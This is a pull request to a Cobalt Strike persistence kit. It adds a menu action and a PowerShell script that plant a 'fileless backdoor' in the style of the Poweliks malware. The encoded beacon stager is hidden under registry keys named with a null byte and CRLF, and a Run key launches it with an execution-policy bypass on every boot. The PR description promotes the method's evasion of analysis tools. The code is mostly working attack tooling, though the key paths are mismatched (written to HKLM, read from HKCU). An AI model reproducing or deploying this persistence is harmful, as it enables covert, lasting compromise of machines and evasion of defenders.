### PR TITLE
added poweliks persistence emulation

### DIFF
--- a/kits/PersistKit/PersistKit.cna
+++ b/kits/PersistKit/PersistKit.cna
@@ -25,6 +25,17 @@ sub createADSBackdoor {
 	});
 }
 
+sub createFilelessBackdoor{
+	$bid = $1;
+	$selectedListener = $2;
+	openOrActivate($bid);
+	$psPayload = powershell_encode_stager(shellcode($selectedListener));
+	binput($bid, "powershell-import Persist-Poweliks.ps1");
+	bpowershell_import($bid, script_resource("PersistKit/scripts/Persist-Poweliks.ps1"));
+	binput($bid, "powershell Persist-Poweliks");
+	bpowershell($bid, "Persist-Poweliks -cobaltstrike_gen_payload \" $+ $psPayload $+ \"");
+}
+
 # Returns a string to use for the reg key name
 sub getADSRegName {
 	prompt_text("Registry key name you'd like to use?", "Update", {
@@ -71,6 +82,14 @@ popup beacon_bottom {
 					openPayloadHelper(lambda({
 					createADSBackdoor($bid, $1);
 				}, $bid => $1));
+			}
+		}
+		item "Create fileless backdoor"{
+			local('$bid');
+			foreach $bid ($1){
+				openPayloadHelper(lambda({
+					createFilelessBackdoor($bid, $1);
+					}, $bid => $1));
 			}
 		}
 	}

--- a/kits/PersistKit/scripts/Persist-Poweliks.ps1
+++ b/kits/PersistKit/scripts/Persist-Poweliks.ps1
@@ -1,0 +1,34 @@
+function Persist-Poweliks{
+<#
+.SYNOPSIS
+This script adds a "fileless backdoor" in a similar manner seen by the Poweliks malware. 
+Author: Jonathan Echavarria (@Und3rf10w)
+
+.DESCRIPTION
+This function creates a registry key with the name of "<nullbyte><CRLF>", that contains an entry named "<nullbyte><CRLF>", that contains a passed base64ed powershell command (payload).
+In addition, a run key entry is created named "<nullbyte><CRLF>" at "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
+that executes the stored payload.
+
+For more information, see: https://isc.sans.edu/forums/diary/20823
+
+.EXAMPLE
+PS C:\> Persist-Poweliks -cobaltstrike_gen_payload <provided by cobalt strike>
+#>
+
+    [CmdletBinding()]
+        Param(
+        [Parameter(Mandatory=$True)]
+        [string]$cobaltstrike_gen_payload
+    )
+
+    [Byte[]]$malformed_ary = 0x00,0x0a,0x0d #`0`r`n
+    $malformed_string = [System.text.encoding]::Unicode.GetString($malformed_ary)
+
+    #Write the malformed registry key
+    new-item -path "HKLM:SOFTWARE\$malformed_string" -force
+
+    #Write the powershell bytecode to a key, $malformed_string, in HKLM:SOFTWARE\$malformed_string
+    new-ItemProperty -path "HKLM:SOFTWARE\$malformed_string" -name "$malformed_string" -value "$cobaltstrike_gen_payload"
+
+    New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name $malformed_string -PropertyType String -value "powershell.exe -ep bypass iex ([Text.Encoding])::ASCII.GetString([Convert]::FromBase64String((gp `'HKCU:SOFTWARE\$malformed_string`').$malformed_string)));"
+}


### PR DESCRIPTION
May want to consider in the future setting a customizable path for the "_hidden_" key that contains the encoded command.

Unfortunately, it looks like hiding reg keys with a non-ASCII value appears to not work against Windows 10's regedit, but this **may** still be useful thwart other analysis tools. Plus, who doesn't like fileless persistence?
